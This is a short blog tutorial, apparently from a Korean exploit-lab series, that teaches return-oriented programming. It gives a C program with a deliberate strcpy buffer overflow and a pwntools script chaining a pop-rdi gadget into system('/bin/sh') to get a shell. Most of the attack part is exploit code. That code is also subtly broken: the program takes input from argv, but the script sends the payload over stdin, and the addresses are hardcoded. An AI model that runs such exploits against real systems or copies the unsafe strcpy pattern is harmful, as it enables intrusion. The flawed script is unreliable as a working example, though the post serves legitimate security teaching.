strangerRidingCaml
6. Return-Oriented Programming (ROP) 본문
728x90
Return-Oriented Programming (ROP)
Return-Oriented Programming (ROP) is a technique used in exploitation where existing code snippets, known as gadgets, are chained together to execute arbitrary commands or escalate privileges.
Lab Activity: Return-Oriented Programming (ROP) Attack
In this lab activity, we'll demonstrate a simple ROP attack on a vulnerable C program.
Defender Side Code:
#include <stdio.h>
#include <string.h>
void vulnerable_function(char *input) {
char buffer[64];
strcpy(buffer, input);
}
int main(int argc, char **argv) {
if (argc != 2) {
printf("Usage: %s \n", argv[0]);
return 1;
}
vulnerable_function(argv[1]);
return 0;
}
To compile the defender side code:
gcc -o vulnerable_program vulnerable_program.c
Exploit Code (Python using pwntools):
from pwn import *
# Addresses of gadgets in the binary
pop_rdi_ret = 0x00400693 # gadget: pop rdi ; ret
system_addr = 0x7ffff7a52390 # address of system() function
bin_sh_addr = 0x7ffff7b97e9a # address of "/bin/sh" string
# Padding to fill the buffer and overwrite the return address
padding = b"A" * 72
# ROP chain
rop_chain = p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(system_addr)
# Payload
payload = padding + rop_chain
# Establishing connection to the vulnerable program
p = process("./vulnerable_program")
# Sending the payload
p.sendline(payload)
# Interactive shell
p.interactive()
The exploit code constructs a ROP chain with gadgets to set up the parameters for the system() function call, including the address of the "/bin/sh" string and the address of the system() function. It then establishes a connection to the vulnerable program, sends the payload, and gains an interactive shell upon successful exploitation.
'Linux kernel exploit' 카테고리의 다른 글
8. Null Pointer Dereference Exploits (0) | 2024.05.12 |
---|---|
7. Write-What-Where (Arbitrary Memory Overwrite) (0) | 2024.05.12 |
5. Return-to-User (ret2usr) Attacks (0) | 2024.05.12 |
4. Stack Smashing (32-bit and 64-bit) (0) | 2024.05.12 |
3. Debugging Kernel and Modules (0) | 2024.05.12 |